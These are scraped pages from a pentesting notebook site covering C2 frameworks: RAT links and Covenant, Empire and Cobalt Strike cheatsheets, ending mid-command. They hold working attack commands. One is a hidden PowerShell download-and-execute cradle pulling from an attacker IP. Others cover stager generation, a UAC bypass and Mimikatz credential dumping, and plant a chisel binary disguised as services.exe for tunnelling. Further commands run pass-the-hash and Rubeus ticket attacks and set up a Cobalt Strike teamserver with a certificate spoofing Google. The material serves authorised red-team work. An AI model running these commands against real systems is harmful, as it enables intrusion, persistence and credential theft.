\[Ansible\](https://ppn.snovvcra.sh/pentest/infrastructure/devops/ansible.md) - \[Artifactory\](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory.md) - \[Atlassian\](https://ppn.snovvcra.sh/pentest/infrastructure/devops/atlassian.md) - \[Containerization / Orchestration\](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration.md) - \[GitLab\](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab.md) - \[HashiCorp Vault\](https://ppn.snovvcra.sh/pentest/infrastructure/devops/hashicorp-vault.md) - \[Jenkins\](https://ppn.snovvcra.sh/pentest/infrastructure/devops/jenkins.md) - \[VS Code\](https://ppn.snovvcra.sh/pentest/infrastructure/devops/vscode.md): Visual Studio Code - \[Zabbix\](https://ppn.snovvcra.sh/pentest/infrastructure/devops/zabbix.md) - \[DBMS\](https://ppn.snovvcra.sh/pentest/infrastructure/dbms.md): Database Management System - \[FireBird\](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/firebird.md) - \[MS SQL\](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql.md) - \[MySQL / MariaDB\](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mysql-mariadb.md) - \[Oracle\](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/oracle.md) - \[Redis\](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/redis.md) - \[SQLite\](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/sqlite.md) - \[Authentication Brute Force\](https://ppn.snovvcra.sh/pentest/infrastructure/authentication-brute-force.md) - \[File Transfer\](https://ppn.snovvcra.sh/pentest/infrastructure/file-transfer.md) - \[IPMI\](https://ppn.snovvcra.sh/pentest/infrastructure/ipmi.md): Intelligent Platform Management Interface - \[Kiosk Breakout\](https://ppn.snovvcra.sh/pentest/infrastructure/kiosk-breakout.md) - \[Low-Hanging Fruits\](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits.md) - \[LPE\](https://ppn.snovvcra.sh/pentest/infrastructure/lpe.md): Local Privilege Escalation - \[Networks\](https://ppn.snovvcra.sh/pentest/infrastructure/networks.md) - \[L2\](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2.md): Data Link Layer (OSI Layer 2) - \[ARP Spoofing\](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/arp-spoofing.md): Address Resolution Protocol - \[DHCPv6 Spoofing\](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/dhcpv6-spoofing.md): Dynamic Host Configuration Protocol version 6 - \[LLMNR / NBNS Poisoning\](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/llmnr-nbns-poisoning.md): Link-Local Multicast Name Resolution / NetBIOS Name Service - \[SNACs Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/snacs-abuse.md): Stale Network Address Configuration - \[VLAN Hopping\](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/vlan-hopping.md): Virtual Local Area Network - \[NAC Bypass\](https://ppn.snovvcra.sh/pentest/infrastructure/networks/nac-bypass.md): Network Access Control & Port Security (MAB, IEEE 802.1X, etc.) - \[Scanning\](https://ppn.snovvcra.sh/pentest/infrastructure/networks/scanning.md) - \[SIP / VoIP\](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sip-voip.md): Session Initiation Protocol / Voice over IP - \[Sniff Traffic\](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sniff-traffic.md) - \[NFS\](https://ppn.snovvcra.sh/pentest/infrastructure/nfs.md): Network File System - \[Persistence\](https://ppn.snovvcra.sh/pentest/infrastructure/persistence.md) - \[Pivoting\](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling.md) - \[Post Exploitation\](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation.md): General Post Exploitation - \[SNMP\](https://ppn.snovvcra.sh/pentest/infrastructure/snmp.md): Simple Network Management Protocol - \[SSH\](https://ppn.snovvcra.sh/pentest/infrastructure/ssh.md): Secure Shell - \[TFTP\](https://ppn.snovvcra.sh/pentest/infrastructure/tftp.md): Trivial File Transfer Protocol - \[VNC\](https://ppn.snovvcra.sh/pentest/infrastructure/vnc.md): Virtual Network Computing - \[OSINT\](https://ppn.snovvcra.sh/pentest/osint.md): Open Source Intelligence - \[Shodan\](https://ppn.snovvcra.sh/pentest/osint/shodan.md) - \[Password Brute Force\](https://ppn.snovvcra.sh/pentest/password-brute-force.md) - \[Generate Wordlists\](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists.md) - \[Perimeter\](https://ppn.snovvcra.sh/pentest/perimeter.md) - \[1C\](https://ppn.snovvcra.sh/pentest/perimeter/1c.md) - \[ADFS\](https://ppn.snovvcra.sh/pentest/perimeter/adfs.md): Active Directory Federation Services - \[Cisco\](https://ppn.snovvcra.sh/pentest/perimeter/cisco.md) - \[DNS\](https://ppn.snovvcra.sh/pentest/perimeter/dns.md): Domain Name System - \[Exchange\](https://ppn.snovvcra.sh/pentest/perimeter/exchange.md) - \[Information Gathering\](https://ppn.snovvcra.sh/pentest/perimeter/information-gathering.md) - \[IPSec\](https://ppn.snovvcra.sh/pentest/perimeter/ipsec.md): IP Security - \[Java RMI\](https://ppn.snovvcra.sh/pentest/perimeter/java-rmi.md): Java Remote Method Invocation - \[Log4j / Log4Shell\](https://ppn.snovvcra.sh/pentest/perimeter/log4j-log4shell.md) - \[Lync & Skype for Business\](https://ppn.snovvcra.sh/pentest/perimeter/lync-s4b.md) - \[NTP\](https://ppn.snovvcra.sh/pentest/perimeter/ntp.md): Network Time Protocol - \[Outlook\](https://ppn.snovvcra.sh/pentest/perimeter/outlook.md) - \[OWA\](https://ppn.snovvcra.sh/pentest/perimeter/owa.md): Outlook Web Access - \[SharePoint\](https://ppn.snovvcra.sh/pentest/perimeter/sharepoint.md) - \[SMTP\](https://ppn.snovvcra.sh/pentest/perimeter/smtp.md): Simple Mail Transfer Protocol - \[SSH\](https://ppn.snovvcra.sh/pentest/perimeter/ssh.md): Secure Shell - \[Subdomain Takeover\](https://ppn.snovvcra.sh/pentest/perimeter/subdomain-takeover.md) - \[Shells\](https://ppn.snovvcra.sh/pentest/shells.md) - \[Reverse Shells\](https://ppn.snovvcra.sh/pentest/shells/reverse-shells.md) - \[Web Shells\](https://ppn.snovvcra.sh/pentest/shells/web-shells.md) - \[Web\](https://ppn.snovvcra.sh/pentest/web.md) - \[2FA Bypass\](https://ppn.snovvcra.sh/pentest/web/2fa-bypass.md) - \[LFI / RFI\](https://ppn.snovvcra.sh/pentest/web/lfi-rfi.md): Local / Remote File Inclusion - \[SOP / CORS\](https://ppn.snovvcra.sh/pentest/web/sop-cors.md): Same-Origin Policy / Cross-Origin Resource Sharing - \[SQLi\](https://ppn.snovvcra.sh/pentest/web/sqli.md): SQL Injection - \[WAF\](https://ppn.snovvcra.sh/pentest/web/waf.md): Web Application Firewall - \[WordPress\](https://ppn.snovvcra.sh/pentest/web/wordpress.md) - \[XSS\](https://ppn.snovvcra.sh/pentest/web/xss.md): Cross-Site Scripting - \[Wi-Fi\](https://ppn.snovvcra.sh/pentest/wi-fi.md) - \[WPA / WPA2\](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2.md) - \[Enterprise\](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/enterprise.md): Wi-Fi Protected Access Enterprise - \[Personal\](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal.md): Wi-Fi Protected Access Personal - \[Basics\](https://ppn.snovvcra.sh/red-team/basics.md) - \[Infrastructure\](https://ppn.snovvcra.sh/red-team/infrastructure.md) - \[Development\](https://ppn.snovvcra.sh/red-team/dev.md) - \[API Hashing\](https://ppn.snovvcra.sh/red-team/dev/api-hashing.md) - \[API Hooking\](https://ppn.snovvcra.sh/red-team/dev/api-hooking.md) - \[BOF / COFF\](https://ppn.snovvcra.sh/red-team/dev/bof-coff.md): Beacon Object Files / Common Object File Format - \[CFG\](https://ppn.snovvcra.sh/red-team/dev/cfg.md): Control Flow Guard - \[Code Injection\](https://ppn.snovvcra.sh/red-team/dev/code-injection.md) - \[DLL Injectors\](https://ppn.snovvcra.sh/red-team/dev/code-injection/dll-injectors.md): Inject DLLs into remote process's virtual address space - \[Process Hollowing\](https://ppn.snovvcra.sh/red-team/dev/code-injection/process-hollowing.md) - \[DLL Hijacking\](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking.md): DLL Hijacking / DLL Side-Loading / DLL Proxying - \[Golang\](https://ppn.snovvcra.sh/red-team/dev/golang.md) - \[Kernel Mode\](https://ppn.snovvcra.sh/red-team/dev/kernel-mode.md) - \[PIC / Shellcode\](https://ppn.snovvcra.sh/red-team/dev/pic-shellcode.md): Position-Independent Code / Shellcode - \[Nim\](https://ppn.snovvcra.sh/red-team/dev/nim.md) - \[Sandbox Evasion\](https://ppn.snovvcra.sh/red-team/dev/sandbox-evasion.md) - \[Syscalls\](https://ppn.snovvcra.sh/red-team/dev/syscalls.md) - \[Windows API\](https://ppn.snovvcra.sh/red-team/dev/winapi.md) - \[BOF\](https://ppn.snovvcra.sh/exploit-dev/bof.md) - \[OSCP BOF\](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof.md): Buffer Overflow (PEN-200 Edit) - \[OSED SEH Overflow\](https://ppn.snovvcra.sh/exploit-dev/bof/osed-sehof.md): Structured Exception Handling Overflow (EXP-301 Edit) - \[RE\](https://ppn.snovvcra.sh/exploit-dev/re.md): Reverse Engineering - \[WinDbg\](https://ppn.snovvcra.sh/exploit-dev/windbg.md) - \[Git\](https://ppn.snovvcra.sh/admin/git.md) - \[Linux\](https://ppn.snovvcra.sh/admin/linux.md) - \[Kali\](https://ppn.snovvcra.sh/admin/linux/kali.md) - \[Networking\](https://ppn.snovvcra.sh/admin/networking.md) - \[DHCP Server & Linux Hotspot\](https://ppn.snovvcra.sh/admin/networking/dhcp-hostapd.md) - \[Quick Configurations\](https://ppn.snovvcra.sh/admin/networking/quick-configurations.md) - \[Routing\](https://ppn.snovvcra.sh/admin/networking/routing.md) - \[WireGuard\](https://ppn.snovvcra.sh/admin/networking/wireguard.md) - \[Virtualization\](https://ppn.snovvcra.sh/admin/virtualization.md) - \[Docker\](https://ppn.snovvcra.sh/admin/virtualization/docker.md) - \[Hyper-V\](https://ppn.snovvcra.sh/admin/virtualization/hyper-v.md) - \[VirtualBox\](https://ppn.snovvcra.sh/admin/virtualization/virtualbox.md) - \[VMWare\](https://ppn.snovvcra.sh/admin/virtualization/vmware.md) - \[Windows\](https://ppn.snovvcra.sh/admin/windows.md) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on a page URL with the \`ask\` query parameter: \`\`\` GET https://ppn.snovvcra.sh/readme.md?ask= \`\`\` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # C2 | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/c2.md) . * [https://www.thec2matrix.com/matrix](https://www.thec2matrix.com/matrix) * [https://xakep.ru/2019/10/18/post-exploitation-frameworks/](https://xakep.ru/2019/10/18/post-exploitation-frameworks/) * [https://medium.com/@lsecqt/using-discord-as-command-and-control-c2-with-python-and-nuitka-8fdced161fdd](https://medium.com/@lsecqt/using-discord-as-command-and-control-c2-with-python-and-nuitka-8fdced161fdd) [](https://ppn.snovvcra.sh/pentest/c2#rat-tools) RAT Tools --------------------------------------------------------------- * [https://breakingsecurity.net/remcos/](https://breakingsecurity.net/remcos/) * [https://jetlogger.app/](https://jetlogger.app/) * [https://github.com/quasar/Quasar](https://github.com/quasar/Quasar) * [https://github.com/moom825/xeno-rat](https://github.com/moom825/xeno-rat) Last updated 6 months ago --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://ppn.snovvcra.sh/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://ppn.snovvcra.sh/pentest/c2.md). # C2 \* \* \* {% embed url="" %} ## RAT Tools \* \* \* \* --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter: \`\`\` GET https://ppn.snovvcra.sh/pentest/c2.md?ask= \`\`\` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Covenant | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/c2/covenant.md) . * [https://github.com/cobbr/Covenant](https://github.com/cobbr/Covenant) * [https://s3cur3th1ssh1t.github.io/Covenant\_Stageless\_HTTP/](https://s3cur3th1ssh1t.github.io/Covenant_Stageless_HTTP/) [](https://ppn.snovvcra.sh/pentest/c2/covenant#install) Install -------------------------------------------------------------------- Copy $ git clone --recurse-submodules https://github.com/cobbr/Covenant $ cd Covenant/Covenant $ dotnet run [](https://ppn.snovvcra.sh/pentest/c2/covenant#cheatsheet) Cheatsheet -------------------------------------------------------------------------- Make a sacrificial token to be used with Over-PtH attacks: Copy (snovvcrash) > MakeToken administrator megacorp.local dummy_Passw0rd! Last updated 2 years ago * [Install](https://ppn.snovvcra.sh/pentest/c2/covenant#install) * [Cheatsheet](https://ppn.snovvcra.sh/pentest/c2/covenant#cheatsheet) --- # Empire | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/c2/empire.md) . * [https://github.com/BC-SECURITY/Empire](https://github.com/BC-SECURITY/Empire) * [https://xakep.ru/2020/06/03/powershell-empire/](https://xakep.ru/2020/06/03/powershell-empire/) [](https://ppn.snovvcra.sh/pentest/c2/empire#install) Install ------------------------------------------------------------------ Copy $ git clone --recursive https://github.com/BC-SECURITY/Empire.git $ cd Empire $ sudo ./setup/install.sh $ sudo poetry install To compile C# agents ([Covenant](https://github.com/cobbr/Covenant) and [Sharpire](https://github.com/0xbadjuju/Sharpire) ) [install](https://docs.microsoft.com/en-us/dotnet/core/install/linux-debian#supported-distributions) .NET SDK 3.1: Copy $ wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb $ sudo dpkg -i packages-microsoft-prod.deb $ rm packages-microsoft-prod.deb $ sudo apt-get update; \ sudo apt-get install -y apt-transport-https && \ sudo apt-get update && \ sudo apt-get install -y dotnet-sdk-3.1 $ sudo apt-get update; \ sudo apt-get install -y apt-transport-https && \ sudo apt-get update && \ sudo apt-get install -y aspnetcore-runtime-3.1 [](https://ppn.snovvcra.sh/pentest/c2/empire#run) Run ---------------------------------------------------------- Reset the database: [](https://ppn.snovvcra.sh/pentest/c2/empire#cheatsheet) Cheatsheet ------------------------------------------------------------------------ Basic PowerShell launcher string: Prepare a listener: Generate a PowerShell stager: Generate a C# stager: Re-inject into an interactive process (e. g., `explorer.exe`): Bypass UAC to get a high integrity process: Execute a PowerShell script from memory (e. g., [`Invoke-SharpSecDump.ps1`](https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpSecDump.ps1) ): Start a process in the background (e. g., [chisel](https://github.com/jpillora/chisel) SOCKS proxy): Invoke a custom Mimikatz command: [](https://ppn.snovvcra.sh/pentest/c2/empire#plugins) Plugins ------------------------------------------------------------------ * [https://github.com/BC-SECURITY/SocksProxyServer-Plugin](https://github.com/BC-SECURITY/SocksProxyServer-Plugin) * [https://github.com/BC-SECURITY/ChiselServer-Plugin](https://github.com/BC-SECURITY/ChiselServer-Plugin) [](https://ppn.snovvcra.sh/pentest/c2/empire#customizing-agents) Customizing Agents ---------------------------------------------------------------------------------------- * [https://s3cur3th1ssh1t.github.io/Customizing\_C2\_Frameworks/](https://s3cur3th1ssh1t.github.io/Customizing_C2_Frameworks/) Last updated 2 years ago * [Install](https://ppn.snovvcra.sh/pentest/c2/empire#install) * [Run](https://ppn.snovvcra.sh/pentest/c2/empire#run) * [Cheatsheet](https://ppn.snovvcra.sh/pentest/c2/empire#cheatsheet) * [Plugins](https://ppn.snovvcra.sh/pentest/c2/empire#plugins) * [Customizing Agents](https://ppn.snovvcra.sh/pentest/c2/empire#customizing-agents) Copy $ ./ps-empire server [--restip 127.0.0.1 --username snovvcrash --password 'Passw0rd!'] $ ./ps-empire client Copy $ ./ps-empire server --reset Copy PS > powershell -NoP -sta -NonI -W Hidden -Exec Bypass -C "IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/launcher.ps1')" Copy (Empire) > listeners (Empire: listeners) > uselistener http (Empire: uselistener/http) > set Name http1 (Empire: uselistener/http) > set Host 10.10.13.37 (Empire: uselistener/http) > set Port 80 (Empire: uselistener/http) > execute Copy (Empire: listeners) > usestager multi/launcher (Empire: usestager/multi/launcher) > set Listener http1 (Empire: usestager/multi/launcher) > set OutFile pwsh.ps1 (Empire: usestager/multi/launcher) > generate Copy (Empire: listeners) > useplugin csharpserver (Empire: useplugin/csharpserver) > set status start (Empire: useplugin/csharpserver) > execute (Empire: useplugin/csharpserver) > usestager windows/csharp_exe (Empire: usestager/windows/csharp_exe) > set Listener http1 (Empire: usestager/windows/csharp_exe) > set OutFile csharp.exe (Empire: usestager/windows/csharp_exe) > generate Copy (Empire: listeners) > agents (Empire: agents) > rename LKH7SD3V A1 (Empire: agents) > interact A1 (Empire: A1) > sysinfo (Empire: A1) > shell Get-Process explorer (Empire: A1) > psinject exch Copy (Empire: A1) > shell whoami /priv (Empire: A1) > usemodule privesc/bypassuac_fodhelper (Empire: powershell/privesc/bypassuac_fodhelper) > set Listener http1 (Empire: powershell/privesc/bypassuac_fodhelper) > run Copy (Empire: A1) > shell whoami /priv (Empire: A1) > usemodule management/invoke_script (Empire: powershell/management/invoke_script) > set ScriptPath /home/snovvcrash/tools/dump.ps1 (Empire: powershell/management/invoke_script) > set ScriptCmd Invoke-SharpSecDump -C "-tager=127.0.0.1" (Empire: powershell/management/invoke_script) > run Copy (Empire: A1) > shell IWR http://10.10.13.37:8080/chisel.exe -OutFile C:\Windows\services.exe -UseBasicParsing (Empire: A1) > shell Start-Process -NoNewWindow -FilePath C:\Windows\services.exe -ArgumentList "client 10.10.13.37:8000 R:socks" Copy (Empire: A1) > usemodule credentials/mimikatz/command (Empire: powershell/credentials/mimikatz/command) > set Command '"privilege::debug" "token::elevate" "ts::logonpasswords" "exit"' (Empire: powershell/credentials/mimikatz/command) > run --- # Cobalt Strike | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike.md) . * [https://reconshell.com/list-of-awesome-cobaltstrike-resources/](https://reconshell.com/list-of-awesome-cobaltstrike-resources/) * [https://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet](https://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet) Run as a daemon: Service Unit Start Script /etc/systemd/system/cobaltstrike.service Copy [Unit] Description=CobaltStrike After=network.target StartLimitIntervalSec=0 [Service] Type=simple Restart=on-failure RestartSec=3 User=root ExecStart=/opt/CobaltStrike/start.sh [Install] WantedBy=multi-user.target /opt/CobaltStrike/start.sh Copy #!/bin/bash CS_IP=`hostname -I | awk '{print $1}'` CS_PASS='Passw0rd1!' CS_PATH='/opt/CobaltStrike' rm -{f} "${CS_PATH}/Profiles/random_c2_profile/output/*.profile" CS_PROFILE=`cd "${CS_PATH}/Profiles/random_c2_profile"; python3 ./random_c2profile.py | tail -1 | awk -F/ '{print $2}'` if [ ! -f "${CS_PATH}/cobaltstrike.store" ]; then /usr/bin/keytool -keystore ./cobaltstrike.store -storepass 'Passw0rd2!' -keypass 'Passw0rd2!' -genkey -keyalg RSA -alias cobaltstrike -dname 'CN=google.com, O=Google Inc, L=Mountain View, ST=California, C=US' fi ${CS_PATH}/TeamServerImage -Dcobaltstrike.server_port=1337 -Dcobaltstrike.server_bindto="${CS_IP}" -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword='Passw0rd2!' teamserver "${CS_IP}" "${CS_PASS}" "${CS_PATH}/Profiles/random_c2_profile/output/${CS_PROFILE}" [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#malleable-c2-profiles) Malleable C2 Profiles ----------------------------------------------------------------------------------------------------- * [https://blog.zsec.uk/cobalt-strike-profiles/](https://blog.zsec.uk/cobalt-strike-profiles/) * [https://github.com/rsmudge/Malleable-C2-Profiles](https://github.com/rsmudge/Malleable-C2-Profiles) ### [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#sourcepoint) SourcePoint * [https://github.com/Tylous/SourcePoint](https://github.com/Tylous/SourcePoint) [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#aggressor-scripts) Aggressor Scripts --------------------------------------------------------------------------------------------- * [https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/agressor\_script.htm](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/agressor_script.htm) * [https://chowdera.com/2021/02/20210204190220156W.html](https://chowdera.com/2021/02/20210204190220156W.html) * [https://www.kingstonesecurity.com/blog/efficiency-with-aggressor](https://www.kingstonesecurity.com/blog/efficiency-with-aggressor) [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#community-kit) Community Kit ------------------------------------------------------------------------------------- * [https://cobalt-strike.github.io/community\_kit/](https://cobalt-strike.github.io/community_kit/) [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#p2p-beacons) P2P Beacons --------------------------------------------------------------------------------- Beacon TCP and Beacon SMB are Peer-to-Peer beacons which means they're used to chain a connection to an existent beacon. They act like bind shells and waits for the attacker to connect to them. Connect to a TCP beacon: Connect to an SMB beacon: [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#dns-beacons) DNS Beacons --------------------------------------------------------------------------------- * [https://www.cobaltstrike.com/blog/simple-dns-redirectors-for-cobalt-strike/](https://www.cobaltstrike.com/blog/simple-dns-redirectors-for-cobalt-strike/) Create an `A` record `ns66.example.com` pointing to IP address of the redirector and then an `NS` record pointing to `ns66.example.com`. Before starting a DNS listener, the localhost resolver should be shut down if necessary: `sudo systemctl disable systemd-resolved --now`. ### [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#socat-redirector) socat Redirector On the redirector: On the team server: ### [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#iptables-redirector) iptables Redirector Add Delete ### [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#dnsmasq-redirector) DNSMasq Redirector * [https://buaq.net/go-20984.html](https://buaq.net/go-20984.html) [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#overpass-the-hash) Overpass-the-Hash --------------------------------------------------------------------------------------------- More opsec PtH than builtin `pth` command (which does the Mimikatz `sekurlsa::pth` thing with named pipe impersonation): Same with Rubeus (must be in elevated context): Use Rubeus with lower privileges: [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#pass-the-ticket) Pass-the-Ticket ----------------------------------------------------------------------------------------- Create a sacrificial process, import the TGT into its logon session and steal its security token: [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#pivoting) Pivoting --------------------------------------------------------------------------- Make any traffic hitting port **8443** on Victim to be redirected to **10.10.13.37** on port **443** (traffic flows through the team server): Make any traffic hitting port **8080** on Victim to be redirected to **localhost:80** on Attacker (traffic flows through the CS client): Forward SOCKS server's port from team server to the client: [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#credentials) Credentials --------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#dpapi) DPAPI List credential blobs: List vault credentials: Check which master keys correspond to credential blobs (look for **guidMasterKey** field with GUID): The master key is stored here: Decrypt the master key via RPC on the Domain Controller and show it: Decrypt the blob with decrypted master key: [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#evasion) Evasion ------------------------------------------------------------------------- * [\[PDF\] Avoiding Memory Scanners (Kyle Avery, @kyleavery)](https://www.blackhillsinfosec.com/avoiding-memory-scanners/) * [https://github.com/kyleavery/AceLdr](https://github.com/kyleavery/AceLdr) ### [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#sleep-mask) Sleep Mask [Shellcode In-Memory Fluctuation (Obfuscate and Sleep)](https://ppn.snovvcra.sh/red-team/dev/code-injection#shellcode-in-memory-fluctuation-obfuscate-and-sleep) * [https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures](https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures) * [https://adamsvoboda.net/sleeping-with-a-mask-on-cobaltstrike/](https://adamsvoboda.net/sleeping-with-a-mask-on-cobaltstrike/) * [https://codex-7.gitbook.io/codexs-terminal-window/red-team/cobalt-strike/evading-hunt-sleeping-beacons](https://codex-7.gitbook.io/codexs-terminal-window/red-team/cobalt-strike/evading-hunt-sleeping-beacons) [](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#detection) Detection ----------------------------------------------------------------------------- * [https://github.com/chronicle/GCTI](https://github.com/chronicle/GCTI) Last updated 8 months ago * [Malleable C2 Profiles](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#malleable-c2-profiles) * [SourcePoint](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#sourcepoint) * [Aggressor Scripts](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#aggressor-scripts) * [Community Kit](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#community-kit) * [P2P Beacons](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#p2p-beacons) * [DNS Beacons](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#dns-beacons) * [socat Redirector](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#socat-redirector) * [iptables Redirector](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#iptables-redirector) * [DNSMasq Redirector](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#dnsmasq-redirector) * [Overpass-the-Hash](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#overpass-the-hash) * [Pass-the-Ticket](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#pass-the-ticket) * [Pivoting](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#pivoting) * [Credentials](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#credentials) * [DPAPI](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#dpapi) * [Evasion](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#evasion) * [Sleep Mask](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#sleep-mask) * [Detection](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike#detection) Copy $ ./SourcePoint -Host www.microsoft.com -Forwarder -Sleep 20 -Jitter 20 -Injector NtMapViewOfSection -Stage False -Syscall Indirect -Outfile test.profile Copy beacon> connect Copy beacon> link Copy $ sudo socat -T 1 udp4-listen:53,fork tcp4::5353 Copy $ socat -T 10 tcp4-listen:5353,fork udp4:127.0.0.1:53 dns-forwarder-on.sh Copy sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward' sudo iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT sudo iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination --destination-port 53 -j MARK --set-mark 0x400 sudo iptables -t nat -A PREROUTING -m mark --mark 0x400 --protocol udp -j DNAT --to-destination :53 sudo iptables -t nat -A POSTROUTING -m mark --mark 0x400 -j MASQUERADE sudo iptables -I FORWARD -j ACCEPT dns-forwarder-off.sh Copy sudo sh -c 'echo 0 > /proc/sys/net/ipv4/ip_forward' sudo iptables -D INPUT -p udp -m udp --dport 53 -j ACCEPT sudo iptables -t nat -D PREROUTING -m state --state NEW --protocol udp --destination --destination-port 53 -j MARK --set-mark 0x400 sudo iptables -t nat -D PREROUTING -m mark --mark 0x400 --protocol udp -j DNAT --to-destination :53 sudo iptables -t nat -D POSTROUTING -m mark --mark 0x400 -j MASQUERADE sudo iptables -D FORWARD -j ACCEPT Copy beacon> mimikatz sekurlsa::pth /user:snovvcrash /domain:megacorp.local /ntlm:fc525c9683e8fe067095ba2ddc971889 beacon> steal_token 1337 Copy beacon> execute-assembly Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /aes256:94b4d075fd15ba856b4b7f6a13f76133f5f5ffc280685518cad6f732302ce9ac /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe beacon> steal_token 1337 Copy beacon> execute-assembly Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /aes256:94b4d075fd15ba856b4b7f6a13f76133f5f5ffc280685518cad6f732302ce9ac /nowrap /opsec PS > [System.IO.File]::WriteAllBytes("C:\Windows\Tasks\tgt.kirbi", [System.Convert]::FromBase64String("")) Or $ echo -en "" | base64 -d > tgt.kirbi beacon> run klist Or beacon> execute-assembly Rubeus.exe klist beacon> make_token MEGACORP\snovvcrash dummy_Passw0rd! beacon> kerberos_ticket_use C:\Windows\Tasks\tgt.kirbi Copy beacon> execute-assembly 